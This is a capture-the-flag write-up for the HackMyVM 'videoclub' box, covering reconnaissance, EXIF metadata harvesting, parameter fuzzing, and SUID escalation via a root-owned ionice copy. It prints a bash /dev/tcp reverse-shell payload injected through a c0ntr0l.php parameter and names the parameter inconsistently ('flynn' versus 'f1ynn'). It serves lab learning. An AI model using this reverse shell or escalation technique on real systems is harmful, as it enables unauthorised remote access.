
HackMyVM target series (6): videoclub

2022-07-06 13:58:00 The moon should know my meaning

1. Information gathering

Since this is the campus network and there are too many hosts, I searched for a keyword directly to find the target machine.

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

Port scan with nmap to find the target's open ports. As the picture shows, SSH and HTTP services are open.

nmap -sV -sC -p- -sT 192.168.200.161

Visit port 3377.

Seeing this page I thought it was a CMS, so I ran whatweb for fingerprinting.

whatweb http://192.168.200.161:3377

But it did not identify any CMS.

So scan for directories first.

gobuster dir -u http://192.168.200.161:3377 -w directory-list-2.3-medium.txt -x php,html,txt,7z,zip,bak,gz

Quite a few things were found; visit them one by one.

Found a directory listing that is full of pictures.

video

Apache user manual

Visiting robots.txt, there is a long string of characters at the bottom. At first I thought it was base64 encoded, but decoding it only gave garbage.

There is also a file name hidden at the bottom of robots.txt.

Visiting the list-defaulters.txt file shows the following. At first I really could not see what it meant, but after looking at it carefully I found that the combination of the things circled below looked odd.

Readers of my previous article should already know what exiftool is:

ExifTool, developed by Phil Harvey, is free, cross-platform open-source software for reading, writing and processing the metadata of files such as images (mainly), audio, video and PDF.

"steg hide" should mean that something is hidden in the file attributes?

2. Exploitation

Use exiftool to read the metadata of the pictures. hackers.jpg is the most suspicious one, so look at its properties first.

As the figure shows, this string stood out immediately, so next check whether the other pictures and videos also have a Copyright attribute.
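The Copyright check above can be scripted instead of running exiftool by hand. The following is an added example, not code from the write-up: it parses the EXIF APP1 segment of a JPEG with only the standard library and returns the Copyright tag, and it builds its own constructed sample JPEG (the string inside it is the one found on this box) so that it runs offline; short values that TIFF stores inline are handled too.

```python
import struct

COPYRIGHT_TAG = 0x8298  # TIFF/EXIF "Copyright" tag, the field that carried the strings on this box

def _copyright_from_tiff(tiff: bytes):
    """Walk IFD0 of the embedded TIFF structure and return the Copyright string, if any."""
    if len(tiff) < 8 or tiff[:2] not in (b'II', b'MM'):
        return None
    bo = '<' if tiff[:2] == b'II' else '>'  # byte-order mark: II = little endian, MM = big endian
    magic, ifd0 = struct.unpack(bo + 'HI', tiff[2:8])
    if magic != 42 or ifd0 + 2 > len(tiff):
        return None
    for i in range(struct.unpack(bo + 'H', tiff[ifd0:ifd0 + 2])[0]):  # entry count
        e = ifd0 + 2 + 12 * i
        tag, typ, n, off = struct.unpack(bo + 'HHII', tiff[e:e + 12])
        if tag == COPYRIGHT_TAG and typ == 2:  # type 2 = ASCII; values of <= 4 bytes are stored inline
            raw = tiff[e + 8:e + 8 + n] if n <= 4 else tiff[off:off + n]
            return raw.rstrip(b'\x00').decode('latin-1')
    return None

def exif_copyright(jpeg: bytes):
    """Return the EXIF Copyright field of a JPEG file, or None when it has none."""
    pos = 2 if jpeg[:2] == b'\xff\xd8' else len(jpeg)  # must start with the SOI marker
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or start of scan: no more header segments follow
            break
        seglen = struct.unpack('>H', jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b'Exif\x00\x00'):  # APP1 segment holding Exif
            return _copyright_from_tiff(seg[6:])
        pos += 2 + seglen
    return None

def build_sample_jpeg(text: str) -> bytes:
    """Constructed minimal JPEG (SOI + APP1/Exif + EOI) that carries only a Copyright tag."""
    data = text.encode() + b'\x00'
    # Little-endian TIFF header, IFD0 at offset 8 with one entry; longer strings are placed at offset 26
    value = data.ljust(4, b'\x00') if len(data) <= 4 else struct.pack('<I', 26)
    tiff = b'II' + struct.pack('<HI', 42, 8) + struct.pack('<H', 1)
    tiff += struct.pack('<HHI', COPYRIGHT_TAG, 2, len(data)) + value + struct.pack('<I', 0)
    tiff += data if len(data) > 4 else b''
    payload = b'Exif\x00\x00' + tiff
    return b'\xff\xd8\xff\xe1' + struct.pack('>H', len(payload) + 2) + payload + b'\xff\xd9'

if __name__ == '__main__':
    print(exif_copyright(build_sample_jpeg('zerial_killer:bien_cabron')))  # string from the write-up
```

To use it on the downloaded files, read each file as bytes and pass it to exif_copyright; it returns None for files without an Exif segment.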

I wrote a Python script to crawl all the pictures down from the target.

To crawl the videos, just change images to videos.

import requests
from bs4 import BeautifulSoup

# Change images to videos to grab the videos directory instead
BASE = 'http://192.168.200.161:3377/images/'

resp = requests.get(BASE)
soup = BeautifulSoup(resp.text, 'html.parser')
hrefs = [a['href'] for a in soup.find_all('a', href=True)]
# Skip the Apache sort links (?C=N;O=D ...), the parent-directory link and any subdirectory
files = [h for h in hrefs if '?' not in h and not h.endswith('/')]
for name in files:
    url = BASE + name
    print(url)
    content = requests.get(url).content
    with open(name.split('/')[-1], 'wb') as f:
        f.write(content)

Finally, the following information was collected from all the pictures and videos.

img:
zerial_killer:bien_cabron

video:
LostDVD:k1nd3rs
LostDVD=t3rm1n4t0r
LostDVD=m14_w4ll4c3
LostDVD=c0n3h34ds
secret_film:c0ntr0l

At first I thought these were usernames and passwords, so I tried logging in with each of them, but unsurprisingly they all failed.

Then combine these with the list-defaulters.txt file above into a wordlist, as shown in the figure below.

Use dirsearch for a directory scan with the wordlist we just generated.

dirsearch -u "http://192.168.200.161:3377/" -t 50 -e php,htmp,txt,7z,zip,gz,bak -x404,500,599 -w /home/kali/Desktop/video/dict.txt

The scan results are as follows .

Then run another round of directory scanning with gobuster.

gobuster dir -u "http://192.168.200.161:3377/" -t 30 -x php,htmp,txt,7z,zip,gz,bak -w dict.txt

The scan results are as follows; compared with dirsearch there is one more file, c0ntr0l.php.

I was really surprised by this result: same wordlist, yet dirsearch missed one entry. This step held me up for a long time, so from now on I will always run directory scans with two scanners.

Visiting all the results one by one, the other content is either videos or pictures and has no value.

Only c0ntr0l.php returns a blank page. I sense something here!

http://192.168.200.161:3377/c0ntr0l.php

This request does not seem to take any parameters, so use wfuzz to fuzz for one and see if there is a surprise.

The wordlist is again the one we collected before!

wfuzz -c --hc=404 -t 500 -w dict.txt http://192.168.200.161:3377/c0ntr0l.php?FUZZ=id

The result is as follows: the flynn parameter produces a response different from all the others.

Visit http://192.168.200.161:3377/c0ntr0l.php?flynn=id

?? Commands can actually be executed here. Doesn't that mean a direct reverse shell?

Listen on port 6666 on Kali.

Then visit the following with HackBar:

http://192.168.200.161:3377/c0ntr0l.php?f1ynn=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.200.192%2F6666%200%3E%261'

Back on Kali, the reverse shell has come in, but the privileges are only those of the web user.

3. Privilege escalation

Check the /home directory: two directories are found. The secret_film directory looks a little familiar. Look at the picture and video information we collected above: doesn't it contain exactly this? Take it and try to log in.

Uh..... Login failed; something seems wrong. How come the owner of the secret_film directory is root?

Checking /etc/passwd, I'm impressed: there is no such user as secret_film. This box really has a lot of pitfalls!

The home directory of the librarian user is readable and accessible by any user.

Let's see what is in that directory.

flag is found, and any user can read it directly. Get the first flag.

Here we also find an executable with the s bit set, and its owner is root. Is there a chance of SUID privilege escalation?

Run the following command to look for files with the SUID bit.

find / -perm -u=s -type f 2>/dev/null

Be careful when escalating: do not just run ionice /bin/sh -p directly, otherwise, like me, you will still end up with www-data privileges. which ionice shows that the ionice command resolves to /usr/bin/ionice, and that file does not have the s bit.

You need to use the absolute path for the escalation to succeed.

/home/librarian/ionice /bin/bash -p
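The find command above, together with the pitfall of ionice resolving through PATH, is easy to turn into a reusable audit. The following is an added example, not from the write-up: it lists setuid regular files the way find -perm -u=s -type f does, narrows them to root-owned files outside the package-managed directories (a stray copy of ionice in a home directory is exactly what it is meant to surface), and reports what a bare command name resolves to and whether that file is setuid. The system directory list, the pseudo-filesystem list and the constructed temporary tree are assumptions.

```python
import os
import shutil
import stat
import tempfile

# Directories where package-managed setuid binaries normally live; anything elsewhere deserves a look
SYSTEM_DIRS = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/usr/libexec/',
               '/usr/local/bin/', '/usr/local/sbin/', '/snap/')
PSEUDO_FS = ('/proc', '/sys', '/dev', '/run')  # kernel pseudo-filesystems: not worth walking

def find_setuid(root='/'):
    """Python equivalent of `find / -perm -u=s -type f 2>/dev/null`: (path, owner uid) of setuid files."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits

def suspicious(hits):
    """Root-owned setuid files outside the system directories, e.g. a copy of ionice in a home directory."""
    return [(p, uid) for p, uid in hits if uid == 0 and not p.startswith(SYSTEM_DIRS)]

def resolved_binary(cmd):
    """What PATH lookup picks for a bare command name and whether that file is setuid (the ionice pitfall)."""
    path = shutil.which(cmd)
    if path is None:
        return None
    return path, bool(os.stat(path).st_mode & stat.S_ISUID)

def make_demo_tree():
    """Constructed tree: a temporary 'home' with one file we try to mark setuid (some mounts may refuse)."""
    home = tempfile.mkdtemp(prefix='librarian_')
    demo = os.path.join(home, 'ionice')
    open(demo, 'wb').close()
    os.chmod(demo, 0o4755)
    marked = bool(os.stat(demo).st_mode & stat.S_ISUID)
    return home, demo, marked

def remove_demo_tree(home):
    """Delete the constructed tree again."""
    shutil.rmtree(home, ignore_errors=True)
```

On a real host, run suspicious(find_setuid('/')) and compare resolved_binary('ionice') with the absolute path you intend to execute.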

Switch to the /root directory. root.txt is not there, but there is a note-for-new-administrator file. Reading it, it tells us that root.txt has been moved somewhere else.

Use the find command to search for the root.txt file directly.

find / -name root.txt


Copyright notice
This article was written by [The moon should know my meaning]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/187/202207060917556419.html